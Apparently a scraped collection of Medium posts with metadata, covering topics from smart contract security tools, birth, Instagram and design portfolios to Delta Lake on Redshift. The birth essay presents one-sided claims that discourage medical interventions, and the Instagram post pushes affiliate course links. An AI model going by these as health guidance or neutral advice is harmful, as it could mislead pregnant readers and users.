Security tools. There are a plethora of tools that developers could use internally to check the security of developed smart contracts. The frequency of checks might range from every major build to every major release based on the complexity of smart contracts and needs. These tools are mostly open-sourced. Main tools that frequently came up in conversations are Mythril.ai, Securify, Oyente, QuantStamp (marketplace), KLab, Trail-of-bits, Octopus, Solidified . A common thread across these tools is that they check for known vulnerabilities. Depending on the method it might be more or less sufficient, but definitely not the ultimate security companies want. The output of such tools is usually the type of mistake and the line where it occurs. Companies frequently complain about the high level of false positives. False positives arise due to over-approximating the check against known patterns of bugs and not considering the intent amongst other issues.
There are a plethora of tools that developers could use internally to check the security of developed smart contracts. The frequency of checks might range from every major build to every major release based on the complexity of smart contracts and needs. These tools are mostly open-sourced. Main tools that frequently came up in conversations are Mythril.ai, Securify, Oyente, QuantStamp (marketplace), KLab, Trail-of-bits, Octopus, Solidified A common thread across these tools is that they check for known vulnerabilities. Depending on the method it might be more or less sufficient, but definitely not the ultimate security companies want. The output of such tools is usually the type of mistake and the line where it occurs. Companies frequently complain about the high level of false positives. False positives arise due to over-approximating the check against known patterns of bugs and not considering the intent amongst other issues. Audit firms. A gold standard in the blockchain industry is to hire auditors that do the code review. These firms might be: 1) smart contract security specific companies such as Hosho, 2) traditional big house such as EY or 3) blockchain native enterprises such as Consensys. Besides focused audit, the main value that customers get is a stamp of approval, i.e., an audit certificate, that augments the code’s credibility. One of the clients, that I talked too, was struck by the idea that in the case of a breach, audit firms bear little responsibility other than reputational risk. The financial burden lies with the developers. The result of the audit is usually a report that describes discovered flaws and classifies them by severity. Both DAO and Parity had (allegedly) passed audits before the attacks happened.
What about a different approach?
All companies that I talked to use at least some security tools. These tools are useful, but the tools do not understand the meaning and semantics of the code in sufficient depth. Hence the need for an expert in smart contract security to review the output of the tools. Very few companies have such experts in-house, and that is why audit firms thrive. Moreover, audit firms’ employees have seen hundreds of different cases and can conduct tests that are scoped a bit beyond known bugs. But still, it is not the authoritative security that companies desire. What if we had another method that combined the best of both worlds and did automated end-to-end verification exploring the attack space?
End-to-end verification for general software is close to intractable, and very hard without extensive annotations. However, smart contracts run within a restricted execution environment, e.g., EVM. This makes their verification/synthesis tractable. Even with upcoming blockchain scaling solutions, smart contract executions will always be restrictive. The reason is slightly technical, but it has to do with the fact that the stability of the entire network, i.e., the ability of miners to make progress, will be under question without restrictions. What this means is that the property that makes smart contracts possible on the blockchain, i.e., truncated executions using gas limits or similar techniques, also enable proofs about them.
Synthetic Minds
I spent this winter at Synthetic Minds as employee #2. This is a YC company that raised $5.5m from Khosla Ventures and uses Program Synthesis to provide a managed service for smart contract security. In a nutshell, Synthetic Minds’ product is able to automatically read smart contract code, understand it, and then explore the space of potential attacks, both known and unknown. Moreover, using Program Synthesis the system synthesizes attacker’s code to allows customers to understand and examine how vulnerabilities might be exploited. Smart contract security is a vivid example of an area where Program Synthesis might solve the problem better and in a much more usable way than with other means.
As a side note, Synthetic Minds’ way of doing synthesis is different from the baseline CEGIS described in Post 1.
High-level schema of Synthetic Minds’ approach to smart contract security
As with any applications of Program Synthesis, writing specifications for the smart contract’s functionality might be complex. The insight here is that specifications becomes simpler when written assuming an adversary. For instance: “don’t leak balance”, “keep user metadata disjoint”, “non-admins cannot update identities” can be stated in simpler ways by describing what the attacker can and cannot do. Once these requirements are stated, the automated system proves whether the conditions are met, or if they are not (=bug) it synthesizes an adversary’s code. Such method yields significant business advantages:
Higher confidence because the system explores potential attackers, including those that we don’t yet know. With such verification, companies get guarantees which they don’t get with testing/auditing. The system doesn’t require specifications for each function and instead does end-to-end verification. To start using the system requires very little manual work. The output is explicit attacker’s code rather than a set of functions and labels in the code. Possible exploit scenario allows developers to speed up the debugging process, and use them as future test cases. Fewer false positives that helps developers focus on the important issues.
The system takes as input a smart contract in Solidity and either 1) assertions in the code or 2) plain English description of the properties e.g. “keep metadata disjoint” (which the Synthetic Minds team converts into assertions). Source languages besides Solidity will be added soon.
Geeky stuff or where is Program Synthesis?
Under the hood, the system works as follows. For every smart contract A and a number of properties (x,y,z) Synthetic Minds create a generic user X that is given access to functions within A. The system then uses symbolic execution over unknown programs to automatically analyze A across potential transactions and time. It then produces a number of theorems and proves them using Z3 theorem solver.
This solution explores the attack space and evaluates to either 1) “no violation”, in which case it generates an independently (machine) checkable proof-certificate or 2) synthesized code for an adversary. Synthetic Minds’ solution is looking for property conformance from first principles, rather than checking against past exploits. This is one of the major differences from other solutions. If there are no flaws, then Synthetic Minds produces a proof-certificate that companies can independently verify. The proof-certificate is mechanically check-able, and not just a PDF.
What’s next?
Program Synthesis is a very exciting space that has a huge potential to change not only specific applications such as smart contract security but the whole Software Development industry. For instance, another problem that Program Synthesis could solve is the scarcity of blockchain-focused software developers. From late 2017 to late 2018 the number of openings for blockchain-skilled developers rose by 400% to 12,000+. Moreover, the salaries are higher by an average of 10%–20% versus non-blockchain fields. Use of Program Synthesis could not only augment blockchain developers but also give capabilities of smart contract development to people without coding skills.
But even outside of blockchain there are a plethora of opportunities for Program Synthesis. Many applications from the pricing of derivatives to the training of robots are being tackled. I am sure that in the next years we’ll see many great products released by Synthetic Minds and other emerging companies in the space.
|
https://medium.com/@vidiborskiy/program-synthesis-smart-contract-security-101-d708002b2198
|
['Alexander Vidiborskiy']
|
2019-02-01 01:26:17.814000+00:00
|
['Program Synthesis', 'Synthetic Minds', 'Smart Contracts', 'Security', 'Blockchain']
|
Leadership Skill — Two Ways Perspective in Leadership — How to be a middle manager in your company
|
Leadership Skill — Two Ways Perspective in Leadership — How to be a middle manager in your company Marcello Judhandoyo Sep 7·3 min read
Hi reader, let me introduce myself. My name is Marcello, working as a full-time entrepreneur. Right now, I lead 2 companies named Livera & Chameleon who consist of total employee more than 15 people. It’s still a small company but I believe that the company will be bigger than now and realize my vision. I am very excited to talk about leadership, business, & management. That’s why I create my Medium to discuss more that topic.
I will start with the “Leadership” topic. In this article, I will start with “two ways perspective in leadership skill”. Sometimes as a human, we take sides with something that we hear from another person that closes with us. We judge something because everyone blames it, are you the one who does that too in your life?
In my humble opinion, as a leader, we need to see 2 perspectives of every case that we face. Let’s discuss the simplest thing that we face every day in work-life.
As an employee, we always think about how hard our task is. Maybe we always say that our boss is not as hard as us. The employee thinks that their boss is not doing anything and enjoy the “result” of the employee’s job.
In the meantime, as a c-level or management, we always think about how hard our task is. Always demand the employee to improve the performance and create a bigger impact for the company. The boss thinks that their employee enjoys their life and not doing anything right in the daily work life (maybe not all leader/boss like this).
This is simple but very impactful for a leader and as a middle manager in a company who connects the employee & the c-level. They need to know each other responsible and going to the same vision (that’s why we need the vision & mission the first time we create a company).
Okay, let’s break down the case. The problem of this case is they don’t know each other responsibilities. As a leader, we need to keep between them and not take sides with someone (not to c-level / management & not to employee).
From the employee side, they need to know the management pain. Needs to look for investment for business growth, employee well-being, responsible to improve the self skill & employee skill, think about a career path in the company that they create, cash flow, and a lot of problem in management’s head. The truth is the employee doesn’t need to think about that, the employee needs to work and think about the result for a better result. The employee doesn’t need to think about everything that the management thinks.
From the management side, they need to know the employee pain. Needs to run their life, pay the bill, work-life balance, and other things that the employee needs.
From this perspective, we can see that no one is wrong and no one is right. The only thing is about having two perspectives and empathy for each other. The management needs to think about their employee and create a good work ecosystem with a work-life balance. In the meantime, the employee needs to know the struggle of the management to keep improve and innovate to make the company run. With this balance, the “wheel” of the cart named “Company” will always move and create a better future for everyone inside the company.
|
https://medium.com/@mjudhandoyo/leadership-skill-two-ways-perspective-in-leadership-how-to-be-a-middle-manager-in-your-company-dc3fd89caaf0
|
['Marcello Judhandoyo']
|
2021-09-07 16:17:22.766000+00:00
|
['Entrepreneurship', 'Startup Lessons', 'Leadership Skills', 'Leadership', 'Startup Life']
|
Congratulate The New Parents With These Newborn Baby Wishes!
|
Wondering about what to write or how to congratulate the parents of the newborns? Here are a few quotes and messages that we have compiled to make your task easier. Give your newborn a perfect welcome with these heartwarming baby wishes!
It is finally time to show your excitement and happiness at the arrival of the newborn into the family and also send your good wishes and prayers for the adorable babies.
1. Wishes for triplets
“Congratulations on the arrival of 3 new lives! May these lives be filled with love and peace. May your precious baby bring lots of joy to your family! Lots of love and warm wishes for your future.” “Babies are wonders, babies are fun, congratulations on your three new little ones!” “Born with buddies — how fun is that? Congrats on your triplets.”
2. Baby wishes for twins
“Having twins is like setting a new business — double the hard work in the starting, but double the return as the years go by. Congratulations.” “You have more than one reason to celebrate. God had blessed you with two bundles of fun. Congratulations.” “Forget all the happy memories of the life that you’ve had so far. As compared to being parents to twins, nothing comes at par. Congratulations.”
3. Newborn baby wishes for a girl
“Warmest congratualtions on the birth of your cutest baby girl!” “A baby girl promises to love her father and respect her mother! cannot wait to meet this little bundle of joy! All the best for future.” “We can’t wait to see the many ways God blesses you with this little one.”
4. Wishes for baby boy
|
https://medium.com/@BookEventz.com/congratulate-the-new-parents-with-these-newborn-baby-wishes-b6e13e143584
|
[]
|
2020-05-05 07:10:02.161000+00:00
|
['Newborn', 'Baby Photos', 'Wishes', 'Baby', 'Parenting']
|
Are We Being Ripped Off With Over-Medicalised Births?
|
Can giving birth be an ecstatic, rather than a traumatic and disempowering, experience?
I am writing this on the morning of the ‘due date’ (or shall we say ‘guess date’) of my second child. I am in eager anticipation, not just of finally meeting my new baby and holding her in my arms, but of the actual birthing process itself. I rarely tell anyone this but my first words after giving birth to my son, naturally at home three years ago, were ‘I want to do it again!’ I meant giving birth itself, not just the end result of it.
Was it quick? No. Was it easy? No! It was the most challenging, intense experience of my life and there were both sweat and tears, but it was also the most rewarding, magical, empowering, and life changing event — not just because I ended up with the new love of my life in my arms. It was the experience of giving birth itself that was ecstatic. Unaltered, undisturbed and completely primal. I was at home, in my safe space, with my few chosen people to relentlessly support and nurture me. I had the most soothing beautiful music I’d chosen, candles, essential oils, and lots and lots of love and tenderness surrounding me. The birth unfolded beautifully with the help of all that. Yet, it wasn’t just these factors which made it so special.
A rite of passage
After my son was born, I was naturally high from the actual birthing experience for months. I thought about it every single day, with euphoric awe. The best I can describe it as, is a rite of passage that prepared me for my new life as a mother. (And I had always been told by various doctors that I couldn’t get pregnant naturally, if at all… but that is another story!)
So why has birth become such a pain, a ‘necessary evil’ — sometimes so much so that we would rather have invasive and risky abdominal surgery just to avoid having to go through it? (Without taking away from the fact that sometimes, though much less frequently than performed, surgery is indeed necessary.) Why have we come to believe that giving birth is a medical emergency, rather than a natural process that the body knows how to carry out quite effectively? This is a trick question, for the question is also the answer: because the belief that birth is a painful medical event that needs to be managed and controlled with medical procedures, has made it a reality! It is the very mistrust in our own bodies, the expectation of pain, difficulty, and complications and the presence of excessive monitoring that brings about the need for more interventions. How?
Expectations
A few generations ago, birthing was a family event. It happened most often at home (in my country of origin, Finland, usually in the sauna). There were other mothers, grandmothers, and perhaps older siblings present — the nearest and dearest womenfolk to support the birthing mother. Perhaps a midwife if one was lucky. Most women, by the time they were giving birth themselves, would have already witnessed a natural birth.
Most of what we hear from each other and see in the movies and on TV these days is pain and agony. I remember seeing a video in primary school of a woman giving birth, and I still remember that woman lying on her back in stirrups, screaming with a twisted face and her jaw clenched with tension, with a male doctor next to her telling her to push. It looked like the opposite of empowering, magical, and joyful. It seemed more like humiliation and torture! The sad thing is that this is what most of us these days have come to expect.
The fear-tension-pain syndrome
It is the fear and expectation of pain that produce excessive amounts of true pain because of the pathological tension it creates in the physical body. This is called the Fear-Tension-Pain Syndrome (FTPS). When this vicious cycle is established, it creates a crescendo of events which are experienced as true pain, which justify more fear and stronger resistance, which contribute to even more pain and more difficult labour… “The most important contributory cause of pain in otherwise normal labour is fear.” [Read.G.D.]
This doesn’t mean that the pain women experience during labour isn’t real. Quite contrary: it is very real indeed. But it doesn’t have to be so! Our body is beautifully designed to create a nothing less than mind-blowing cocktail of hormones that can help us experience intensity, even ecstasy, instead of pain.
Better than all the drugs on the planet
These hormones can see us through normal childbirth without pharmaceutical drugs that have a not-so-great effect on the body’s natural processes (in a same kind of way the anaesthetic a dentist applies to your mouth affects your ability to speak, eat or drink normally) and that also end up in the baby, and thus affect the bonding process and establishment of breastfeeding.
But in order for these incredible hormones, namely oxytocin (the ‘love hormone’), endorphins (natural opiates and analgesics, hormones of pleasure and transcendence) and prolactin (hormone of mothering and surrender), to exist at the required peak levels to make the labour smooth and enjoyable, the woman needs to feel private, safe and unobserved. When adrenalin and noradrenalin (the fight or flight hormones, also needed in the later stages of birth) kick in too early they reduce the production of the ‘feel good’ hormones and significantly reduce blood flow to the uterus and placenta. This can cause adverse fetal heart rates and more fetal distress. Stress-induced adrenalines (for example if the woman feels disturbed in her environment or is under pressure with time) can stall and stop the whole birth process. This often triggers a cascade of interventions.
The ‘Law of the sphincter’
Labouring attached to machinery or IVs that restrict our movements, under bright lights and observation by people we barely know (in the worst case scenario, people we have never met before), having frequent internal checks performed, who can feel private and unobserved? Again, sometimes they are necessary, but in most low-risk births they are not. It is often the very things that are supposed to protect us from the dangers of childbirth that actually make it more complicated, painful and difficult. How? Can you imagine trying to do a number two on the toilet, with bright lighting and having your nether regions observed by strangers who are timing and measuring your progress, giving you a deadline by when you need to have finished your business?! Ok, point made, but what does having a poo have to do with giving birth, you may ask…
Ina Mae Gaskin, the most famous midwife and childbirth educator of all times, refers to it as the ‘Sphincter Law’:
Sphincter muscles of both anus and vagina do not respond on command. Sphincter muscles open more easily in a comfortable, intimate atmosphere where a woman feels safe. The muscles are more likely to open if the woman feels positive about herself; where she feels inspired and enjoys the birth process. Sphincter muscles may suddenly close even if they have already dilated, if the woman feels threatened in any way.
Medical support
Of course there are times when medical intervention is required and when it saves the lives of babies and mothers. We are lucky to have access to advanced medical support when we need it. And many women indeed feel safest giving birth in a hospital, which makes is the best place for them to birth. But all too often, the current medical model is simply in the way of the natural process because of strict hospital policies, time limits and protocol, which feed the lack of belief in the body’s capability to do it on its own. One intervention leads to another, and birth easily becomes a traumatic medical event where women feel at the mercy of the hospital staff and procedures. Perhaps the medical model could better support the natural ability of a woman to give birth and apply the principle of ‘leaving well alone.’
What can we do?
The best thing we can do as women is to educate ourselves on the physiological processes of the birth and of the pros and cons of different interventions in different situations. This way, we can approach birth without unnecessary fear and make educated choices for ourselves and our babies. It is necessary to remember that we always have a choice to decline any procedure that we consider unnecessary — even if the hospital staff make it sound like we don’t.
-We can practise inducing the relaxation response in the mind and body through guided relaxation and breathing exercises.This helps keep muscle tension to a minimum, allowing the body to birth in the optimal way.
-We can eat well and exercise during pregnancy to be fit and healthy for birth.
-We can choose as our caregivers professionals who trust in our ability to birth naturally. Caregivers who are willing to wait and do nothing if no intervention is necessary, who understand the importance of our emotional well-being before and during birth, and who are willing to support us in the way we want to birth our children. (I highly recommend pre-natal education courses such as CalmBirth or SheBirths for all of the above.)
|
https://medium.com/@liisahalme/are-we-being-ripped-off-with-a-medicalised-conveyer-belt-births-8589a874bae
|
['Liisa Halme']
|
2019-11-16 21:04:18.818000+00:00
|
['Birth', 'Birthing', 'Homebirth', 'Birth Trauma', 'Pregnancy']
|
What is Instagram? How to Create an Instagram Account
|
What is Instagram? How to Create an Instagram Account
Instagram is a social media platform, where people share photos and short videos. In this article, I will tell you what instagram is and how to create an Instagram account. And also some other stuff about Instagram. Zihad Hossain Dec 27, 2020·5 min read
Over the past few years, Instagram’s popularity has grown very fast — In December 2016, the number of Instagram users are 428.1 million. And now, in 2020 the number of users are more than 854.5 million!
Taking selfie for Instagram
If you don’t have an Instagram account and even don’t know that what Is Instagram. Then this article is for you. In this article, we are cover all the basics. So that you know what Instagram is and how you can create an account on Instagram.
The number of Instagram users has increased a lot over time. Millions of people and celebrities use this social media platform to engage with their audience. People usually share their life moments with their followers on Instagram.
What Is Instagram?
Instagram is a free photo and video sharing social media, available for Android, Apple, iOS and Windows Phone. You can upload your photos or videos and share them with your followers or friends.
Simply, Instagram is a social media platform where you can engage with others by sharing your photos and videos. You can also build your own followers on Instagram. Instagram is now biggest online photo sharing platform.
Instagram allow users to edit and share photos and short videos through a mobile app. Users can add a caption to every of their posts and use hashtags to reach more people. And also users can use location-based geotags to index these posts. Every post by a user, show’s on their followers Instagram feeds and those post are also reach to the new people by using the right hashtags.
Users have the right of making their profile private. If they do, only their followers able to see their posts.
Using Instagram application
As a social networking platforms, Instagram users also can love(react), comment and share others posts, they can send personal messages to their friends or followers via the Instagram Direct feature.
In Instagram, you can share your photos or videos on many more social media sites — together with Twitter, Facebook and Tumblr- with just one click!
Instagram isn’t just a tool for general use, Instagram is also very effective for businesses. Many digital marketer and business owners using Instagram for their marketing or business. Because, you can easily engage with lots of people in a very short time on Instagram. Also, thousands of people making millions of dollars just using Instagram. But for this, at first you need a good amount of followers.
Don’t worry, if you know the actual methods then it is very easy for anyone to get millions of real Instagram followers. If you want to learn those methods step by step from very beginning to professional influencer, then check this out — click here
Who owns Instagram?
Instagram was launched in 2010 in San Francisco. Instagram was created just to share photos. Instagram was created by Kevin Systrom and Mike Krieger.
But today you can also share videos on Instagram and offer direct messaging and many more. In 2012, Facebook bought Instagram and make it more useful.
Now, you will find many features on Instagram that were not there before. Also, now you will find many types of filters in it to customize your pictures and videos.
Using Instagram
First of all you need to create your account on Instagram, if you have a Facebook account you can sign up directly through it.
After signing up, you have to choose your unique username. Then your own profile should be set up well. You can keep the profile completely private if you wish. If your profile is private, people will not see you directly, they will need to send a request first and then you will accept it. Only then will they be able to see your photos and videos.
Using Instagram application
You can follow your friends, family members, celebrities, favorite personalities, etc. so that when they share a picture, you can see them all. People also follow you, if they like your contents. If your wishing to become a successful Instagram influencer then this met can help you — click here
Creating an Instagram Account
1. To create an Instagram account, first you need to go to the Google Play Store and download the Instagram apps.
2. After downloading the Instagram app, you need to sign up. You can sign up with one click with the help of your Facebook account or you can open an Instagram account with your mobile number, email id.
3. If you click on Facebook and sign up for an Instagram account, then your Instagram account has been created.
And if you create an Instagram account with a mobile number or email ID, you will be asked to enter your name and the Instagram account will be credited as soon as you enter the name. You can customize your account from “Edit Profile”
Thanks for reading this. To learn more about Instagram and how to earn from this, I recommend you to take this course. If you buy course from this link, you will get a big discount! check this out.
link — click here.
[Disclaimer: This post may contain affiiate links, which means I may receive a small commition, at no cost to you, if you make a purchase through a link.]
|
https://medium.com/@zihadh687/what-is-instagram-how-to-create-an-instagram-account-dd4a2d5c457a
|
['Zihad Hossain']
|
2020-12-27 03:27:57.670000+00:00
|
['Instagram', 'How To Create', 'Instagram Account', 'What Is Instagram', 'Social Media']
|
Fitness Trauma: when your patient can’t tell you where it hurts.
|
What follows is a letter I wrote to my physical therapist:
I cried through my last week’s session, performing exercises while swallowing mucous and choking back tears. I had to pause at one point to go the bathroom and cry freely, embarrassed, angry, frustrated. I left today’s session in tears too. I tried to tell you, I did, but you had two other patients you had to see and I couldn’t get the words out and the tears were already coming.
I’m coming to you for a pretty simple problem. Pain. My knee and shoulder hurts. I’ve got weak muscles, you’ve got exercises. You prescribe them, I do them, and my pain goes away. Healing is not linear, there will be ups and downs, but what is shaking me to the point of crying, breaking down, getting nervous to even go to my sessions?
Can we talk about fitness trauma? I googled it and there’s no one talking about this, so I made up the term. I’m talking about elementary school gym class when I cried “running” the mile, crippled by cramps in my abdomen from not breathing properly, not knowing how to run. I ended up walking, it took me 13 minutes, by far the slowest in the class. I never knew what to do in gym class, I never understood it. Later, as an adult, I felt overwhelmed going to a gym or fitness center. I don’t understand the machines, but more importantly I don’t understand my body.
I’m not connected to my body. For the longest time, I didn’t have a relationship with exercise. The effort felt torturous. I tried my hand at CrossFit, even joined a weight lifting gym. I still felt disconnected from my body, flopping around, performing moves without any understanding of how or why, desperately needing to be closely coached and monitored. I never gained that ownership, and ended up quitting all of it.
Finally, two years ago, I fell in love with hiking, and learned how to run. Last year I added an intense yoga practice to the mix. For the first time in my life I understood the relationship between effort and reward. I developed a neurochemical connection to movement. I unlocked my hiker and runner’s high, exertion of a level that made my brain and body sing. I ran three times a week, longer and longer runs. I topped out at 12 miles. I backpacked a 125 mile section of the Appalachian Trail, and 26 Adirondack high peaks. I found my bliss in this life.
Then, a knee injury, followed shortly after by a shoulder injury. My knee hurt so bad I couldn’t run, couldn’t stand, could barely be in any position comfortably. Soon enough, I found that both my knees hurt, my shoulder, my elbow, both my wrists, and my foot. I felt broken and at a complete loss. Without proper insurance coverage, unable to afford physical therapy, I went to my chiropractor for help. He did some functional tests and gave me exercises to strengthen my glutes, quads, and core, to which I applied myself like my life depended on it, which it did. I worked at my exercises relentlessly, daily, picking up short weekly runs again after two months off. This summer, I hiked the high peaks again and my knees felt stronger than ever. I finally felt I had turned the corner on this awful chapter in my life.
I attempted another Adirondack hike a few weeks later. It was night and day. My knees felt worse than they ever had. Pain with each step, and 13 miles left to get me out of the backcountry. No cell service, no choice. I hiked out. After that I doubled down on my exercises, hoping to fix the problem twice as hard and twice as fast.
What might seem intuitive to others, which muscles feel the effort in an exercise, is not to me. I often cannot tell what part of my body is feeling something. I have a history of abuse and trauma, and my family has a strong predisposition to psychosomatic complaints. We all know our bodies can manifest our emotions. Some get headaches, some stomach aches, some tension in the neck and shoulders. When I get stressed out, my throat hurts, and I feel as though I have a cold. If I get really stressed, sometimes I dissociate, and my body no longer feels like it is mine at all. I’ve worked through some of my trauma in EMDR therapy, and my psychosomatic responses are getting milder and milder the more of my abuse I unpack. But if I cry, I’m still sick for 4–5 days following. Maybe you are starting to see the complex set of factors some of your patients may be dealing with?
When you give me an exercise, if I can’t feel it, can’t trust my body, I turn to my mind. I overthink it. I finally understand that rows are a back/scapula exercise, but does that mean it’s two moves, with the arms doing the first part of the work, then the shoulder blades/back performing the second part? Where should my feet be? What angle should all the parts of my body be at, which muscles should I keep tight, which loose? How do I talk to those muscles to get them to do that? Tell me exactly what to do, and watch me, because I can’t feel if I’m doing it right. You’ll see me with my hands on my body often, checking to make sure my hips are level, my core is tight, my glutes are squeezing.
I am slowly moving into my body, learning to inhabit it, learning to be comfortable here. Maybe this disconnection contributed to my injuries. Pushing past subtle signals of discomfort and pain that I didn’t even notice, or didn’t think were important. It has taken me weeks or even months to feel certain muscles working in my body. I had no sense of my glutes, scapular muscles, or core muscles for the first six months of working with them. I’m trying to honor my body now, not push it past pain, take care of it, make it feel safe with me at the helm. But I also feel completely over-attuned to my knee sensations, overanalyzing every twinge. I am in a paradox — both disconnected and overinvolved.
So when I’m given too many cues on a complex movement like a deadlift, I get overwhelmed. Not enough cues, though, and I worry about getting injured. Am I going to hurt my back doing deadlifts wrong? The coach at the weightlifting gym I was at would sit at his desk and describe the moves, never getting up to show me. When I balked, scared to do it wrong, scared to hurt myself, he laughed at me. “It’s easy”, his laugh said, “why are you making this such a big deal?”. He made me feel stupid and ashamed. Fitness trauma. I’ve even considered going to physical therapy school myself, just to finally be able to understand my own body. Do I need to study it? Learn all the names of all the muscles? Or do I need to listen to it? Feel it? Start to trust myself and my body for the first time in my life at the age of 32?
I need you, in ways I don’t want to, but I do. I need to fix these injuries, to reclaim my life. I am so self-conscious of being the troublesome, difficult, unpleasant patient. I want you to want to work with me, to want to help me. I want to be easy and cheerful and compliant. This is what I’m struggling with, though, and I am hoping that if I tell you, honestly, perhaps you can have some empathy and compassion for me as I fumble to tell you that “this week, uh, my knee felt weird, kinda on the outside, it doesn’t feel twisted anymore you see but, um, it kinda hurts, well, maybe pain isn’t the right word, it’s just, I don’t know, it doesn’t matter, let’s just get on the elliptical.”
I’ll see you next session, I’m doing my best.
Anna
|
https://medium.com/@annatheka/fitness-trauma-when-your-patient-cant-tell-you-where-it-hurts-ebcc0e1f3df9
|
['Anna Ka']
|
2020-12-18 16:23:54.975000+00:00
|
['Trauma', 'Physical Therapy', 'Body', 'Trauma Informed', 'Pyschology']
|
Design Portfolios That Will Actually Get You A Job With No Experience
|
This is an important idea to consider when you’re looking to start your creative career in design and you’re polishing your portfolio for future hiring managers.
It’s important to stand out and showcase your unique skills while telling a cohesive story within your collection of work.
You don’t have to have experience to get hired (although it does help greatly), as long as you sell yourself in the right way.
This means that you’re able to show hiring managers your potential for growth and unique combination of skills that you can bring to their workplace.
You can work around this challenge of “no experience” in multiple ways.
Show only your best work
This might be a no brainer but you would be surprised at how many portfolios are rejected due to “filler” pieces that aren’t as good as the rest of the portfolio.
Many portfolios are rejected due to “filler” pieces that aren’t as good as the rest of the portfolio.
From https://nahelmoussi.com/ Designer Nahel Moussi designed a beautifully creative vertical carousel based on typography to showcase their best work.
From https://nahelmoussi.com/ Designer Nahel Moussi designed a beautifully creative vertical carousel based on typography to showcase their best work.
From https://nahelmoussi.com/. Designer Nahel Moussi designed a beautifully creative vertical carousel based on typography to showcase their best work.
You don’t need to meet a certain number for the work you include in your portfolio. Only include your best work that you can be proud of showing to the world.
A good rule of thumb to go by is to make sure your weakest piece of work doesn’t bring down the rest of the portfolio.
A good rule of thumb to go by is to make sure your weakest piece of work doesn’t bring down the rest of the portfolio.
Add a “Playground” page
In many portfolios, the possibility of adding an experimental draft page is often overlooked. This can be a safe creative space for you to add the work that you wouldn’t put upfront under the “Works” page.
Designer Samuel Kang has a great “playground” page for his experimental projects.
You can also name it whatever you want with common examples being “Playground”, “Lab” or “Mood board”. This can be a great place to show your creative process for hiring managers.
Aesthetics are important, so is accessibility
It can be tempting to put most of your effort into how “good” your portfolio has to look, but what hiring mangers value more is accessibility and functionality as in “How easy is it to navigate through their portfolio?” or “Is every element on the page useful?”
Designer Adrien Laurent uses good color contrast for their portfolio site
Check your menu bar or navigation labels to make sure that even someone with no design experience can explore your portfolio and find what they’re looking for. Make sure everything is legible by checking the font style and size.
Make sure that even someone with no design experience can explore your portfolio and find what they’re looking for.
Don’t be afraid to try different options for your navigation menu such as a four corner menu instead of the typical top-bar menu.
Start with a “hook” and end with a “cliffhanger”
It’s important to have your strongest pieces at the beginning and at the end. This increases the quality of the viewing experience for anyone looking through your portfolio.
It’s important to have your strongest pieces at the beginning and at the end.
“Cliffhanger” pieces that could pique the interest of a hiring manger who many want to know more about your projects can be game changing.
As soon as you get them “hooked”, you automatically have an icebreaker at the interview.
Add page transitions
This is a simple way to add a finishing touch to your portfolio to make it seem more cohesive as a whole. Make sure the transitions aren’t too overwhelming or distracting though as they can ruin the viewing experience.
Designer Denys Loveiko uses animated page transition to showcase his creativity. He kept the transitions fairly subtle and not over the top.
Show variety
It’s important to show a diverse range of work that require different skills to create. Hiring managers need to see that you can do more than one thing.
Hiring managers need to see that you can do more than one thing.
Tell your story
Storytelling is an important skill for designers. Unfortunately, most schools don’t teach this skill to design students.
Our founder and CEO, Stella Guan, told her story in audio, written and visual formats that created an engaging experience for users to get to know her as a person
What kind of story do you want to tell through your work?
Is it clear what you’re trying to convey to someone looking at your portfolio for the first time?
Are components of your story in the correct, logical order?
What is the “behind the scenes” story behind this particular piece of work?
Can you show your human side and tell your life story so that hiring managers can get a glimpse into your personality?
Market yourself at every opportunity
One of the best ways to build connections and network is by being more accessible and easier to find for other creative people in the industry.
One way you can accomplish this is by improving your “coming soon” pages that are still under development. Often times, designers leave these kind of pages blank. This means that people visiting your portfolio are at a dead end.
This problem can be fixed by plugging in your social media accounts and email address or by presenting a teaser or summary for what is to be added to the page.
Designer Andy Davies kept things simple but didn’t forget to include the most important elements right in the first section. You will never struggle to find his social media and contact information.
Keep them interested in your work.
Add a dream client project
This is a way to add a project under your belt without actually being hired. Show what you would do if you were hired by one of your dream employers or big-name companies. Having these kinds of scenarios can help hiring managers visualize what you would do if you were hired in their own company.
It can be daunting to take your first step into the design industry but remember that it gets easier once you get that first design job so make sure to use these tips to make your portfolio even better.
|
https://medium.com/@pathunbound/design-portfolios-that-will-actually-get-you-a-job-with-no-experience-30d7d5cc9c10
|
['Path Unbound']
|
2021-04-01 15:32:37.902000+00:00
|
['Job Search', 'Portfolio', 'Design', 'Designer', 'Ui Ux Design']
|
Experience Amplifier, Sound 1
|
Pavel-to-DMZ Content 3. DMZ Soundscape
The collected sounds from DMZ area and the visual works based on that sounds depict the DMZ lively. It enable audiences to envision their imaginary DMZ space without the physical restriction.
DMZ Soundscape project created by artist Seryoung An and Seunghee Lee, is the fourth content of pavel-to-DMZ. I highly recommend to watch the video only for minutes. On your travel, if you discover similar sounds from what you heard in this video, your joy of hearing would be amplified.
DMZ Soundscape link
Seryoung An, seryoungan@gmail.com / Seunghee Lee, [email protected]
|
https://medium.com/@pavel-to/experience-amplifier-sound-1-61667a3183bf
|
[]
|
2020-12-23 00:12:53.465000+00:00
|
['Dmz', 'South Korea', 'Sound', 'Experience', 'Travel']
|
Data Lakehousing in AWS
|
Extending OSS Delta Lake with Redshift
The open source version of Delta Lake lacks some of the advanced features that are available in its commercial variant.
Caching & Data Layout Optimisation
The use of Amazon Redshift offers some additional capabilities beyond that of Amazon Athena through the use of Materialized Views.
Materialized Views can be leveraged to cache the Redshift Spectrum Delta tables and accelerate queries, performing at the same level as internal Redshift tables. Materialised views refresh faster than CTAS or loads.
Redshift Docs: Create Materialized View
Redshift sort keys can be used to similar effect as the Databricks Z-Order function.
Redshift Docs: Choosing Sort Keys
Redshift Distribution Styles can be used to optimise data layout. This technique allows you to manage a single Delta Lake dimension file but have multiple copies of it in Redshift using multiple materialized views, with distribution strategies tuned to the needs of the the star schema that it is associated with.
Redshift Docs: Choosing a Distribution Style
Delta File Data Layout Optimisation
Delta Lake files will undergo fragmentation from Insert, Delete, Update and Merge (DML) actions. Just like parquet, it is important that they be defragmented on a regular basis, to optimise their performance, which should be done regularly.
The open source version of Delta Lake currently lacks the OPTIMIZE function but does provide the dataChange method which repartitions Delta Lake files.
The one input it requires is the number of partitions, for which we use the following aws cli command to return the the size of the delta Lake file.
eg something like:
aws s3 ls --summarize --recursive "s3://<<s3_delta_path>>" | grep "Total Size" | cut -b 16-
